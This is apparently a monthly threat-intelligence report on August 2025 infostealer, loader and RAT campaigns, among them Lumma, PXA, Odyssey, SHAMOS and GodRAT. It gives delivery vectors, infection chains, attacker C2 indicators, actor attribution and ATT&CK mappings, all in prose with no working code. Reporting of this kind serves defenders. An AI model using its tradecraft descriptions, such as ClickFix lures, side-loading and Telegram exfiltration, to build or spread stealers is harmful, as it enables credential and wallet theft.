Executive Summary

August 2025 witnessed a sharp increase in stealer-focused campaigns, loader innovations, and abuse of trusted platforms across Windows, Android, and macOS environments. Multiple research disclosures highlighted how threat actors continue to evolve old codebases while adopting new distribution techniques.

Commodity Stealers Dominated: Families like Lumma, Rhadamanthys, PXA Stealer, Noodlophile, SalatStealer, and DarkCloud featured heavily in campaigns abusing cracked software sites, phishing emails, and Telegram-based staging. Their targets ranged from enterprise social media accounts to financial data and cryptocurrency wallets.

Loaders on the Rise: Emerging loaders such as XTinyLoader, QuirkyLoader, and HijackLoader refined the use of DLL side-loading, process hollowing, and staged payload delivery, often acting as the first stage for RATs and stealers.

Banking and RAT Campaigns: Advanced threats like GodRAT, PyLangGhost RAT, and Lazarus Android Stealer focused on financial institutions and mobile banking users, leveraging techniques like overlay attacks, steganography, and multi-stage shellcode injection.

macOS Under Fire: Campaigns including Odyssey Stealer (ClickFix) and SHAMOS (AMOS variant) demonstrated growing criminal focus on macOS users, using malvertising, fake help sites, and one-line install commands to bypass Gatekeeper and directly steal browser, Keychain, and crypto data.

Weaponized Utilities: The Tamperedchef campaign showed how fake productivity tools (PDF editors) were pushed through Google Ads, remaining dormant for weeks before activating credential theft features a clear indicator of patient, large-scale operations.

Abuse of Legitimate Services: Attackers repeatedly leveraged Telegram, Google Ads, Dropbox, and even the Internet Archive to stage payloads and hide malicious traffic, making detection and takedown harder.

Real-World Infostealer Campaigns Observed in August

Fake Cheat Website Delivering Lumma Stealer

In August, researchers identified a malicious campaign masquerading as a cheat provider for popular online games under the brand DropCheats. The fraudulent website (dropcheats[.]net) mimicked a legitimate cheat/modding portal, offering “premium game mods” that promised undetectable hacks and regular updates to bypass anti-cheat systems.

The site was highly polished, complete with marketing slogans, a professional layout, and video demos of supposed cheats in action, making it convincing for unsuspecting gamers. Visitors were lured into downloading a ZIP archive (DropCheats.zip) hosted on MediaFire, which instead contained the Lumma Stealer malware.

Attack Flow

Initial Lure : Victims searching for game cheats land on the fake “DropCheats” site, which advertises hacks and mods for competitive games.

Malware Delivery : Clicking the download button fetches DropCheats.zip (≈52 MB) from MediaFire. The file appears as a legitimate cheat installer but actually drops Lumma Stealer.

Execution & Stealth : Once executed, Lumma Stealer harvests sensitive data, including:

• Browser credentials, cookies, and autofill data
• Cryptocurrency wallets and seed phrases
• Discord/Telegram credentials for further spreading
• System fingerprints and key files

Exfiltration : Stolen information is sent to the C2 server at mocadia[.]com. In some samples, Lumma is configured to upload via Telegram bots, further complicating tracking.

FSB Stealer: Fake CyberShield Masquerading as Russian State Antivirus

Researchers uncovered a new infostealer disguised as a fake Russian security product called КиберЩит (CyberShield), which claimed to be a joint development of Kaspersky Lab and the FSB (Federal Security Service of Russia).

The malware mimics a legitimate antivirus/antimalware GUI, using official-looking Russian insignia and patriotic branding to gain trust from local users. Instead of protecting systems, it silently collects sensitive data and exfiltrates it via Telegram bots.

Attack Flow

Lure : Fake Antivirus

• Victims are tricked into downloading and running the “КиберЩит” program, believing it to be a state-backed security tool.
• GUI mimics antivirus dashboards with scanning options and “threat detection.”

Execution : Malware Deployment

Malware is written in .NET and performs mock scanning while actually harvesting data.

Data Harvesting

• Collects system and environment data:
  • Computer name, username, OS, installed antivirus.
  • IP address, country, city (geo-fingerprinting).
  • Running programs and timestamps.
• Looks like a diagnostic scan report, but it’s staged for exfiltration.

Exfiltration

• Config reveals Telegram bot integration:
• BotToken,ChatID
• File upload support, notifications
• Retry/delay settings for persistence
• Stolen files are uploaded directly to attacker-controlled Telegram chats.

PXA Stealer - Telegram-Driven, Multi-Stage Campaign

PXA Stealer is a Python-based infostealer linked to Vietnamese-speaking cybercriminal groups. Active since late 2024, the campaign has evolved into a multi-stage infection chain that hides behind legitimate signed apps and decoy documents. By abusing trusted binaries like Haihaisoft PDF Reader and Microsoft Word 2013, attackers sideload malicious DLLs that drop the final Python payload.

When launched, the app sideloads the DLL, which:

1. Opens a benign decoy document to trick the user.
2. Runs certutil to decode an embedded archive disguised as a PDF.
3. Uses a renamed WinRAR tool (images.png) to silently unpack payloads.
4. Drops a Python interpreter (svchost.exe) and obfuscated script.
5. Ensures persistence with a Registry key and begins data theft.

The final payload steals browser logins, cookies, autofill data, crypto wallets, VPN credentials, and messenger artifacts, then exfiltrates everything to Telegram channels, often through Cloudflare Workers for cover.

Android Malware Campaign Targets Indian Banking Users

Security researchers found a new Android malware campaign mainly hitting Hindi-speaking users in India. The attackers set up phishing websites that look like official bank pages for SBI Card, Axis Bank, IndusInd Bank, and others. These fake sites trick people into downloading a malicious app that pretends to be a banking update or Google Play update.

Once installed, the malware does two things at once:

• Steals financial data : It shows fake banking screens asking for personal and card details (name, number, CVV, expiry date). The stolen info is then sent to the attacker’s servers.
• Mines cryptocurrency in the background : Using a built-in miner based on XMRig, the malware secretly uses the victim’s phone to mine Monero, which makes the device slow and overheated.

SalatStealer (aka WEB_RAT) Dropped by Amadey

A fresh wave of SalatStealer infections has been observed, with Amadey malware acting as the main delivery vector. SalatStealer (also tracked as WEB_RAT) is a growing infostealer family that comes with its own admin panel hosted behind Cloudflare (salat[.]cn/login) and even public code releases via GitHub (importantfiles repository).

The campaign shows a pattern where Amadey acts as a loader, dropping SalatStealer onto compromised systems. Once active, the stealer gathers sensitive information such as browser credentials, cookies, crypto wallets, Discord/Telegram tokens, and system details. The data is exfiltrated to attacker-controlled panels where operators can manage logs and victims at scale.

PyLangGhost RAT - Lazarus Group’s New Stealer Targeting Finance & Tech

Researchers have uncovered a new malware called PyLangGhost RAT, linked to North Korea’s Lazarus subgroup Famous Chollima. This threat is a Python-based rework of the older GoLangGhost RAT and is being used in highly targeted attacks against the finance, cryptocurrency, and technology industries.

The attackers don’t spread this malware through random phishing or pirated apps. Instead, they use fake job interviews and staged online meetings. Victims are tricked with fake errors (like “camera not detected”) during interviews. To “fix” the issue, they are told to run a script which secretly installs the RAT and hands over control of their system.

Once active, PyLangGhost RAT can:

• Steal browser credentials, cookies, and crypto wallet data (MetaMask, Phantom, Coinbase Wallet, etc.)
• Open a reverse shell to run attacker commands
• Upload and download files from the victim’s system
• Use registry keys for persistence
• Communicate with its C2 servers over raw IP addresses

The malware modules (like nvidia.py, config.py, api.py, and command.py) handle persistence, communication, credential theft, and automation. It even bypasses Chrome’s latest encryption protections by impersonating system processes to extract master keys.

XTinyLoader - Modular Loader and Stealer

A new malware family named XTinyLoader is spreading through fake cracked software. Unlike older single-purpose loaders, this one doubles as both a loader and an infostealer.

Once installed, XTinyLoader copies itself into the Windows ProgramData directory and creates a registry Run key to ensure persistence. It uses a mutex check so that only one instance runs at a time. The malware then begins monitoring the system clipboard for cryptocurrency wallet addresses. If it detects Bitcoin, Ethereum, Tron, or Litecoin addresses, it swaps them with attacker-controlled wallets. At the same time, it gathers system information from the infected host and sends it back to a command-and-control server.

XTinyLoader also has dropper functionality. It downloads extra files from attacker infrastructure, stores them on disk, and executes them. Some of these additional payloads are Python scripts that search folders for crypto wallet strings and replace them with new ones. Another variant of the loader can fetch a DLL and inject it into browsers such as Chrome, Brave, and Firefox. This DLL intercepts browser activity to collect sensitive information directly from the victim’s machine.

According to MalwareBazaar telemetry, the first samples of XTinyLoader were seen on July 26, 2025, with activity peaking in early August before tapering off by August 14, 2025.

DarkCloud Stealer Adopts ConfuserEx and VB6 Payload Chain

Researchers recently observed a new infection chain for DarkCloud Stealer, showing how the malware family is evolving to avoid detection. The campaign starts with phishing emails carrying compressed attachments such as TAR, RAR, or 7Z files. These archives contain obfuscated JavaScript or WSF scripts that act as the first-stage downloader.

Once executed, the scripts fetch a PowerShell payload from attacker-controlled open directory servers. The PowerShell code is layered with Base64 and AES encryption, making it harder for analysts to read. It then drops a ConfuserEx-protected .NET executable that launches the next stage.

The loader uses process hollowing to inject the final DarkCloud Stealer payload, which is written in VB6. The payload itself is further protected with RC4 string encryption and contains logic to capture credentials, card data, and system details.

This updated chain shows that DarkCloud’s operators are combining multi-stage loaders with obfuscation tools like ConfuserEx to stay ahead of traditional defenses and frustrate researchers trying to analyze their malware.

Minecraft Mod Lure Drops NjRat Trojan on Gamers

A recent malware campaign took advantage of the Minecraft movie hype by disguising a malicious program as a free version of the game called “Eaglercraft 1.12 Offline.” At first glance, it looked harmless but when people installed it, a working browser-based Minecraft game actually launched, keeping players distracted. But behind the scenes, it secretly installed NjRat, a dangerous type of malware that gives attackers full control of the victim’s computer.

The malware was first detected when security analysts investigated a suspicious installer file. They noticed it carried a fake Microsoft digital signature and unusual hidden files. When run in a controlled environment, it not only launched the Minecraft clone but also dropped hidden programs with names like WindowsServices.exe and Client.exe. These quietly connected to attacker servers and set up ways to make sure the malware would restart every time the computer was turned on.

To make matters worse, NjRat included anti-investigation tricks. If it detected that someone was trying to monitor it with security tools such as Wireshark or Process Hacker, it could deliberately crash the computer with a blue screen of death (BSOD). This makes analysis harder and helps the malware stay under the radar.

This campaign shows how attackers use popular games and trends as bait. By disguising malware as a fun Minecraft clone, they managed to target kids, students, and casual gamers , groups less likely to question where they download software from.

Rhadamanthys Stealer via ClickFix

A new wave of ClickFix phishing campaigns is delivering Rhadamanthys Stealer, showing how attackers are combining social engineering with stealthy loaders to bypass defenses. Victims are lured into executing a malicious MSI installer, which silently deploys the stealer in memory. Unlike older ClickFix operations that mostly dropped NetSupport RAT or AsyncRAT, this one stands out for using a C++-based infostealer with advanced evasion and data theft features.

Once active, the infection chain hides itself under user profile directories, performs anti-VM checks to evade sandboxes, and abuses a compromised system file to launch encrypted communications. Instead of relying on domains, it connects directly to attacker IPs using TLS with self-signed certificates, which makes detection harder but also creates unique hunting artifacts.

A later stage uses a PNG image with steganography to deliver additional payloads.This layering of technical tricks with social engineering makes Rhadamanthys one of the more resilient stealer campaigns seen in recent months.

Lazarus Stealer (Android) - Russian Bank Credential Theft via Overlays & SMS

Lazarus Stealer is a piece of Android malware that pretends to be a harmless app called GiftFlipSoft. Once installed, it hides itself so the user can’t see it on the home screen or in the list of recent apps. Its real goal is to steal banking details from Russian users.

To do this, it asks for very powerful permissions. It tries to make itself the default SMS app, so it can read and send text messages, including one-time passwords (OTPs) from banks. It also asks for the ability to draw over other apps, which lets it place a fake login screen on top of a real banking app. When the victim enters their card number, PIN, or password, the fake screen captures it.

The malware constantly runs in the background, watching which apps are open and stealing data in real time. It regularly sends stolen information like banking details, OTPs, and device info to a remote command-and-control server. From there, attackers can also send instructions, like telling the phone to send specific SMS messages.

HijackLoader - How Pirate Game “Cracks” Lead to Multi Stage Infections

Hackers are using pirated game downloads as a trap to spread malware called HijackLoader. Many people believe these sites are safe if you use an ad blocker but that’s not true. Even with protection, clicking a game link leads you through shady redirect sites until you finally land on a MEGA download.

The file looks like a normal game crack but actually contains hidden malware. Inside the package is a huge file named DivXDownloadManager.dll (over 500 MB). The large size is not real — it’s just “padding” to stop people from uploading it to antivirus or online scanners. Once this file is opened, the malicious code inside starts working.

The loader reads extra hidden files (like quintillionth.ppt, paraffin.html), decrypts them, and then injects code into real Windows files such as shell32.dll. From there, it builds itself up step by step, adding modules that help it hide from antivirus, check if it’s running inside a virtual machine, and trick security tools.

For persistence, HijackLoader creates shortcuts or scheduled tasks so it runs every time the computer starts. The final stage depends on what the hackers want , it can install password stealers, crypto-wallet stealers, RATs (remote access tools), or even crypto-mining software.

Noodlophile Stealer’s New Tactics: Fake Copyright Emails Target Enterprises

A new version of the Noodlophile Stealer malware is being used in cyberattacks against companies with big social media footprints, especially those active on Facebook. Hackers send fake emails claiming a business has violated copyright rules on its Facebook page. These emails look convincing because they include real details about the company, like Page IDs and ownership info, making victims believe they are genuine.

The emails pressure employees to download a “copyright evidence” file, but instead of proof, it contains malware. Once opened, it installs Noodlophile Stealer, a program that secretly steals saved browser data, Facebook cookies, credit card details, and other sensitive information.

What makes this campaign dangerous is that attackers now use legitimate apps with hidden weaknesses to load the malware, plus tricks like Telegram-based commands and disguising files as documents or images. This makes it harder for normal security systems to catch.

Odyssey Stealer: ClickFix Malware Targets macOS Users for Credentials and Crypto Wallets

Researchers have uncovered a new phishing campaign delivering Odyssey Stealer using the ClickFix technique previously seen on Windows but now adapted for macOS. The attack relies on a fake CAPTCHA page that tricks users into copying and pasting malicious commands into their terminal.

Once executed, a base64-encoded script fetches an obfuscated AppleScript payload. This script silently collects sensitive data including browser cookies, saved logins, crypto wallet extensions, Apple Notes, and Keychain files.

Odyssey Stealer then compresses all stolen data into /tmp/out.zip and exfiltrates it to its C2 server (45.146.130[.]131). After upload, it cleans traces by deleting temporary files, making forensic investigation harder.

The campaign highlights how attackers are shifting from classic binary droppers to pure social engineering and script-based attacks, bypassing many traditional detection methods.

QuirkyLoader - A New Malware Loader on the Rise

IBM X-Force has identified QuirkyLoader, a new malware loader first spotted in late 2024, now actively delivering well-known threats like Agent Tesla, AsyncRAT, FormBook, MassLogger, Remcos, Rhadamanthys, and Snake Keylogger.

The attack begins with phishing emails carrying a malicious archive. Inside the archive are three elements: a legitimate executable, an encrypted payload, and a malicious DLL. When the user runs the legitimate program, it triggers DLL side-loading, silently executing the malicious DLL. This DLL decrypts and injects the final payload into system processes, often by hollowing trusted executables like AddInProcess32.exe, InstallUtil.exe, or aspnet_wp.exe.

What makes QuirkyLoader notable is its .NET DLL loader modules compiled with Ahead-of-Time (AOT). This technique makes the binary appear like native C/C++ code, complicating detection. One variant even used the Speck-128 cipher in CTR mode, an unusual encryption choice for malware, to decrypt payloads.

Recent campaigns have been observed in Taiwan (targeting Nusoft employees) and Mexico (random individuals), with payloads ranging from info-stealers to RATs.

Internet Archive Exploited in Stealthy Remcos RAT Campaign

Researchers have uncovered a new malware delivery chain that abuses the Internet Archive (archive.org) to host and deliver malicious payloads. This technique demonstrates how attackers increasingly hide behind trusted services to evade detection and bypass security tools.

The attack starts with a JScript loader, which runs a PowerShell script. This script retrieves a seemingly harmless PNG image file from the Internet Archive. Hidden inside the image is an obfuscated .NET loader, encoded within the RGB values of individual pixels , a classic steganography trick.

Once extracted and executed, the .NET loader establishes persistence via the Windows Registry and then launches the Remcos RAT, a widely used remote access trojan. The final payload connects to its command-and-control (C2) infrastructure through Duck DNS, a free dynamic DNS provider, making the traffic look legitimate at first glance.

This abuse of Internet Archive highlights how public trust in well-known services can be weaponized to deliver sophisticated malware while staying under the radar.

GodRAT - A New RAT Targeting Financial Firms

GodRAT is a new type of malware that targets financial companies, especially trading and brokerage firms. Attackers send fake files over Skype, disguised as financial reports or documents. These files look normal but actually contain hidden code inside images , a trick called steganography.

When opened, the hidden code secretly downloads GodRAT from the attacker’s server. Once inside, it gives hackers full control of the victim’s computer: they can browse files, steal saved browser passwords, and even drop more malware like AsyncRAT.

GodRAT is based on the old Gh0st RAT malware family, but it has been updated with new tricks. For example, it uses expired but legitimate-looking certificates and a special “-Puppet” command to stay hidden.

So far, attacks have been seen in Hong Kong, UAE, Jordan, Lebanon, and Malaysia, with activity continuing into mid-2025.

COOKIE SPIDER’s SHAMOS Campaign on macOS

Between June and August 2025, CrowdStrike detected and blocked a campaign where the cybercriminal group COOKIE SPIDER tried to spread SHAMOS, a variant of the Atomic macOS Stealer (AMOS).

The attackers relied on malvertising fake ads that appeared in Google search results and spoofed GitHub repositories to trick users looking for macOS help or software. Victims were shown fake “support” instructions that told them to paste a one-line command into their Terminal.

That single command silently downloaded SHAMOS, bypassing Apple’s Gatekeeper protections. Once active, the malware collected sensitive data including browser logins, Apple Keychain credentials, notes, and cryptocurrency wallet files. It also dropped fake apps (like a spoofed Ledger wallet) and a botnet module for long-term control. To stay hidden, SHAMOS used obfuscation tricks and exfiltrated stolen data in a compressed ZIP archive via curl.

This campaign shows how attackers are adapting social engineering with simple but powerful techniques. By abusing trusted platforms like Google Ads and GitHub, they made their malicious tools look convincing and easy for victims to run. For enterprises and individuals alike, this highlights the danger of blindly trusting “quick fixes” found online.

How Anatsa’s Fake Apps Spread on Google Play

The Anatsa malware, also known as TeaBot, has been around since 2020 as an Android banking trojan that steals logins, monitors keystrokes, and helps attackers move money from victims’ accounts. In its latest campaigns, Anatsa hides inside fake apps on the Google Play Store, often disguised as document readers. Some of these apps have been downloaded tens of thousands of times, making the threat widespread.

This new version has grown more dangerous it now targets over 831 financial institutions worldwide, including banks, brokerages, and even crypto platforms in regions like Germany, South Korea, and the U.S. Once installed, it requests accessibility permissions that allow it to silently grab SMS messages, pop up fake banking login pages, and steal sensitive data.

Tamperedchef Campaign : The Malicious PDF Editor Scam

Security researchers uncovered a large-scale campaign distributing a trojanized PDF editor called AppSuite PDF Editor. Promoted through multiple websites and even Google Ads campaigns, the app appeared legitimate but secretly contained a backdoor. Initially, the program behaved harmlessly, tricking users into trusting it. However, after about two months, it received an update that activated its malicious features , a stealer dubbed Tamperedchef.

Tamperedchef establishes persistence through registry keys, queries browser databases for saved credentials, and forcefully terminates browsers to unlock stored data. The malware also checks for installed security products before exfiltrating information. Investigations revealed that the PDF editor was signed with digital certificates from several suspicious companies, some likely AI-generated fronts. This points to a threat actor with a long history of disguising malicious utilities as free productivity tools, previously linked to other unwanted software like OneStart and Epibrowser. The campaign primarily impacted organizations across Europe and shows how ad-driven distribution of fake utility apps can rapidly infect enterprise environments.

Exploit and Delivery Vectors Deep Dive

Lumma Stealer

• Vector: A fake game cheat website (dropcheats[.]net) distributing malicious ZIP archives.
• Method: The ZIP file (DropCheats.zip) downloaded from MediaFire contained the Lumma Stealer payload disguised as game cheat software.
• Payload:
  • Browser credentials, cookies, autofill data, and crypto wallets.
  • System information, clipboard contents, and common document/file types.
• Key Trick:
  • Abuse of popular cheat-themed lures to target gamers.
  • Cloud hosting (MediaFire) used to evade detection and increase trust.
  • Communication with C2 server at mocadia[.]com for exfiltration.

FSB Stealer

• Vector: Distributed as a fake antivirus/security tool branded as “КиберЩит (CyberShield),” falsely claiming to be developed by Kaspersky and the FSB.
• Method: .NET-based executable with a GUI mimicking a legitimate antivirus dashboard; provides fake scanning and protection features while secretly harvesting data.
• Payload:
  • System info: computer name, username, OS version, installed AV.
  • Network info: IP address, country, city.
  • Execution details: program name, launch time.
  • Potential file theft based on configurable targets/extensions.
• Key Trick: Pretends to be an official Russian security tool with government logos to gain trust, while secretly stealing data and sending it through Telegram.

PXA Stealer

• Vector: Phishing archives disguised as invoices or documents.
• Method: Sideloaded DLL + decoy documents + bundled WinRAR/Python loader.
• Payload: Harvests credentials, cookies, PII, crypto wallets, VPNs, and messaging data.
• Key Trick: Uses trusted signed software + harmless-looking docs to appear safe, while hiding exfiltration in Telegram traffic for resilience.

Android Malware Campaign

• Vector: Fake banking websites disguised as official Indian financial services.
• Method: Malicious APK acting as a dropper. It loads encrypted components in stages (two loaders + final payload), making static analysis difficult.
• Payload:
  • Fake banking interface to steal personal/financial details.
  • Hidden Monero mining using XMRig with arguments pointing to attacker-controlled mining pools.
• Key Trick: Uses real assets from banking sites and Google Play update screens to appear authentic, while hiding the mining feature until it gets an FCM command.

Salat Stealer

• Vector: Spread mainly through the Amadey loader, which itself arrives via phishing emails, cracked software downloads, or malicious sites.
• Method: Once Amadey infects a system, it silently drops and runs SalatStealer. The stealer then connects to its command-and-control panel to start collecting victim data.
• Payload:
  • Browser credentials, cookies, and autofill data
  • Cryptocurrency wallet information
  • Discord and Telegram tokens
  • Host details such as IP address, system name, and location
• Key Trick:
  • Leverages Amadey’s distribution channels for rapid spread.
  • Maintains an open GitHub repository (“importantfiles”) for resources and updates, making the project easy for operators to access.
  • Uses a Cloudflare-protected admin panel to organize and manage stolen logs securely.

PyLangGhost RAT

• Vector: Spread through fake job interviews where victims are asked to run “fix” commands for camera/mic errors.
• Method: Command downloads a ZIP, expands into a fake Python runtime (csshost.exe), and launches the main loader (nvidia.py).
• Payload: Steals browser credentials, crypto wallets, and system info, while also enabling file transfer and remote shell access.
• Key Trick: Relies on social engineering during interviews to get victims to install the malware themselves, with traffic hidden over raw IPs and weak RC4 encryption.

XTinyLoader

• Vector : Distributed via fake cracked software.
• Method : Copies itself to ProgramData, creates a registry Run key for persistence, and ensures single execution with a mutex. Downloads extra payloads including Python scripts and DLLs for browser injection.
• Payload : Clipboard hijacker targeting Bitcoin, Ethereum, Tron, and Litecoin; system info theft; additional payload delivery.
• Key Trick : Heavy use of XOR encryption for strings and network traffic, plus modular design for crypto theft and browser-based data harvesting.

DarkCloud Stealer

• Vector : Distributed through phishing emails with compressed attachments (TAR, RAR, 7Z) containing obfuscated JS or WSF files.
• Method : Scripts download PowerShell payloads from open directory servers. These drop a ConfuserEx-protected .NET loader, which uses process hollowing to inject the final VB6 DarkCloud payload.
• Payload : Collects credentials, credit card data, and system information, with strings encrypted via RC4 and embedded C2 details.
• Key Trick : Heavy ConfuserEx obfuscation combined with a VB6 final payload and layered scripts makes analysis difficult and allows the stealer to bypass detection.

NjRat Trojan

• Vector : Unofficial Minecraft installer (“Eaglercraft 1.12 Offline”) shared on shady download sites/forums.

• Method : Binder-packed EXE with invalid MS signature opens a local game HTML as decoy while dropping CLIENT.exe/WindowsServices.exe, setting Run-key persistence, mutex, and a firewall allow rule; C2 via Ngrok and AWS.

• Payload : NjRat with keylogging, screen capture, webcam probe, file/registry ops, remote shell, credential theft, and log exfiltration to C2.

• Key Trick : Nostalgia/game lure + live decoy gameplay to lower suspicion, combined with

  anti-tool/BSOD killswitch and tunneling C2 (Ngrok) to blend in and evade blocks.

Rhadamanthys Stealer

• Vector : ClickFix phishing pages prompting users to “fix” an error by running a malicious MSI.
• Method : Uses msiexecexecute the installer in memory, drops files into disguised directories, and launches a stealer payload via a hijacked system file. Later stages hide extra code inside PNG images (steganography).
• Payload : Rhadamanthys Stealer capable of stealing credentials, browser data, crypto wallets, and sensitive system files.
• Key Trick : Blends ClickFix social engineering with technical obfuscation (anti-VM, TLS over raw IPs, PNG-stego payloads), making detection and response difficult.

Lazarus Stealer

• Vector : Sideloaded APK posing as “GiftFlipSoft,” then hidden from the user interface.

• Method : Elevates to default SMS app , requests overlay and usage access ; runs background services (app monitor + SMS forwarder); dynamic WebView pulls phishing pages from C2; continuous device/SMS sync with C2.

• Payload : Credential theft from Russian banking apps via overlays (card/PIN/password),

  OTP interception via SMS read/forward, device profiling, remote SMS send, and ongoing data exfiltration.

• Key Trick : Overlay phishing + SMS role abuse steals credentials while invisibly capturing OTPs, with C2-controlled WebView to update lures on the fly.

HijackLoader

• Vector : HijackLoader spreads through pirated game repack sites, leading users through shady redirects to MEGA links that hide malware inside nested ZIP and 7z bundles.
• Method : A huge fake DLL (DivXDownloadManager.dll) hides the malware. It reads hidden config files, hijacks legit Windows DLLs, and rebuilds encrypted blobs using XOR + compression. It then unhooks security checks, runs anti-VM tricks, and injects into quiet Windows tools (like choice.exe) to stay hidden.
• Payload : Can drop many families stealers (Lumma, RedLine, Vidar), RATs (Remcos, xWorm), miners (XMRig), or other loaders.
• Key Trick : Uses oversized files, DLL hijacking, stack spoofing, and stealthy process injection to evade antivirus and sandboxes.

Noodlophile Stealer

• Vector: Spear-phishing emails posing as Facebook copyright infringement notices.
• Method: Uses Gmail accounts with real Page IDs/ownership info; payloads delivered via DLL side-loading in legitimate apps (e.g., PDF readers, converters).
• Payload: Enhanced Noodlophile Stealer that steals browser data, Facebook cookies, and credit card details.
• Key Trick: Dynamic staging through Telegram group descriptions and obfuscated scripts disguised as documents, making detection harder.

Odyssey Stealer

• Vector: Fake CAPTCHA verification pages using ClickFix phishing technique.
• Method: Base64-encoded commands pasted into the macOS terminal fetch and execute obfuscated AppleScript.
• Payload: AppleScript stealer that targets browser data, crypto wallets, and system files; exfiltrates to /log endpoint.
• Key Trick: No binary drop , execution happens entirely via terminal commands and AppleScript, reducing detection footprints.

QuirkyLoader

• Vector: Spam emails carrying malicious archive attachments.
• Method: DLL side-loading via legitimate executables; loader modules written in .NET with AOT compilation to evade analysis.
• Payload: Infostealers (Agent Tesla, Snake Keylogger, FormBook) and RATs (Remcos, AsyncRAT).
• Key Trick: Uses rare Speck-128 CTR cipher for payload decryption and process hollowing on trusted Windows processes to remain hidden.

Remcos RAT

• Vector: JScript loader executes a PowerShell script.
• Method: PowerShell downloads a PNG from archive.org, extracts a .NET loader hidden in the pixel RGB values.
• Payload: Remcos RAT (stealthy remote access trojan).
• Key Trick: Steganography inside PNG + persistence via registry key + Duck DNS for resilient C2 communication.

God RAT

• Vector: Malicious .scr (screen saver) and .pif files disguised as financial documents, distributed via Skype messenger.
• Method: Steganography is used to embed shellcode inside image files. When executed, the shellcode downloads and injects GodRAT into legitimate processes like curl.exe or cmd.exe. DLL side-loading with expired certificates was also observed.
• Payload: GodRAT (a Gh0st RAT variant), supporting plugins such as FileManager, along with secondary implants like AsyncRAT and password stealers for Chrome and Edge.
• Key Trick: Uses the “-Puppet” parameter (a throwback to AwesomePuppet RAT), shellcode loaders hidden in images, and signed-but-expired executables for stealth.

SHAMOS Stealer

• Vector: Fake macOS help websites promoted via Google malvertising and spoofed GitHub repos.
• Method: Victims searching for macOS fixes were shown fake “support pages” that tricked them into pasting a one-line Terminal command. The command bypassed Gatekeeper and installed SHAMOS directly.
• Payload: A Mach-O executable that steals browser data, Keychain credentials, Apple Notes, and cryptocurrency wallet details. It also dropped a fake Ledger Live app and a botnet module for extended control.
• Key Trick: Used Base64-encoded commands and trusted services (malvertising + GitHub) to appear legitimate, while silently exfiltrating stolen data in a out.zip archive via curl.

Anatsa malware

• Vector: Fake “document reader” apps on Google Play Store.
• Method: Decoy apps look legitimate but secretly download the Anatsa payload as an update from a C2 server.
• Payload: Banking trojan with credential theft, keylogging, fake banking pages, and crypto wallet targeting.
• Key Trick: Uses runtime DES decryption, device checks, and malformed APK archives to evade Google’s detection and security tools.

Threat Actor Attribution

Several campaigns observed in August 2025 were linked to known or suspected threat actor groups. Below is a summary of actors, their likely regions, motives, preferred targets, and associated malware.

Threat Actor / Group	Region	Motives	Targets	Associated Malware
COOKIE SPIDER	Russia / Eastern Europe	Financial gain via malware-as-a-service (MaaS)	macOS users (crypto holders, developers)	SHAMOS (AMOS variant)
Winnti-linked Actors (GodRAT Evolution)	China	Long-term espionage & financial theft	Financial firms (trading, brokerage)	GodRAT (Gh0st RAT lineage), AsyncRAT
Lazarus-linked Android Operators	North Korea	Financial theft, espionage	Russian banking users	Lazarus Stealer (Android overlay/SMS)
PXA Stealer Operators	Unknown (Telegram-driven)	Credential theft, monetization	Global users, Telegram communities	PXA Stealer
Rhadamanthys Affiliates	Global	Info-stealer distribution	Enterprises via ClickFix phishing	Rhadamanthys Stealer
Noodlophile Developers	Likely Eastern Europe	Credential & session cookie theft	Enterprises with Facebook presence	Noodlophile Stealer
XTinyLoader Operators	Unknown	Initial access broker (stealer/RAT delivery)	Global Windows users	XTinyLoader
QuirkyLoader Actors	Unknown (suspected financially motivated)	Loader for stealers & RATs	Taiwan (Nusoft employees), Mexico (individuals)	QuirkyLoader (Agent Tesla, AsyncRAT, Remcos, Snake Keylogger)
Android Banking Campaign Operators	India	Financial theft	Indian banking app users	Android banking malware (Anatsa variant suspected)
DarkCloud Operators	Unknown	Data theft & credential resale	Global Windows users	DarkCloud Stealer
Fake Cheat/Minecraft Mod Actors	Global	Credential theft, crypto theft	Gamers (Minecraft & cheat tool users)	Lumma Stealer, NjRat
Tamperedchef Campaign Operators	Likely Southeast Asia	Malware monetization via ads	Enterprises & end-users (Europe focus)	Tamperedchef (PDF Editor stealer)
Odyssey Stealer Actors	Unknown	macOS data theft (crypto, credentials)	macOS users (via ClickFix CAPTCHA)	Odyssey Stealer
SalatStealer Affiliates	Likely Eastern Europe	Data resale, credential theft	Global via Amadey loader	SalatStealer (aka WEB_RAT)
PyLangGhost Developers (Lazarus-linked)	North Korea	Espionage & financial theft	Finance & tech sectors	PyLangGhost RAT

Infostealer Impact Trends – August 2025

Throughout August 2025, active infostealer campaigns continued to compromise large volumes of accounts across domains, email providers, social media platforms, and geographic regions. Analysis of the top ten most impacted entities highlights how attackers strategically target widely used services to maximize reach and monetization opportunities.

Top 10 Most Compromised Domains by Infostealers

Domains: Popular platforms such as Google, Facebook, Live.com, and Instagram remain the most compromised, reflecting their role as primary identity providers and gateways to other services.

Top 10 Most Compromised Email Providers by Infostealers

Email Providers: Gmail dominates the list, with significantly higher compromise counts compared to other providers, underscoring its centrality in personal and professional communications.

Top 10 Most Compromised Social Media Platforms by Infostealers

Social Media Platforms: Facebook, Instagram, and Twitter top the list, showing that attackers continue to focus on accounts that can be abused for scams, influence operations, and secondary compromises.

Top 10 Most Infected Countries by Infostealers

Countries: India, the United States, and Brazil lead the infection landscape, suggesting that both high user density and diverse digital ecosystems attract threat actor activity.

The daily trend highlights how infostealer campaigns unfolded in sharp waves, with quiet periods followed by sudden spikes. Activity intensified mid to late July, showing a pattern of coordinated, large-scale campaigns rather than steady infections.

YARA Rules

For detection of known stealers observed in the report:

• DarkCloud Stealer : DarkCloud Stealer
• Lumma Stealer : Lumma Stealer
• Rhadamanthys Stealer : Rhadamanthys Stealer
• Salat Stealer : Salat Stealer
• Lazarus Stealer : Lazarus Stealer

TTP Matrix (MITRE ATT&CK Mapping)

Malware / Campaign	Initial Access	Execution	Persistence	Exfiltration	C2 Communication
Lumma Stealer (Fake Cheat Sites)	T1566.002 – Spearphishing Link (fake cheat websites / malvertising)	T1204.002 – User Execution: Malicious File	T1547.001 – Registry Run Keys	T1005 – Data from Local System, T1555 – Credentials from Password Stores	T1071.001 – Web Protocols (HTTP/S)
FSB Stealer (Fake CyberShield)	T1195 – Supply Chain Compromise (fake AV installer)	T1204.002 – User Execution	T1547 – Boot or Logon Autostart	T1557 – Man-in-the-Middle for credential theft	T1071.001 – Web C2
PXA Stealer (Telegram-driven)	T1566 – Phishing via Telegram channels	T1059.006 – Command and Scripting Interpreter (Python)	T1547.001 – Registry Run Keys	T1005 – Data from Local System	T1071.001 – Web C2
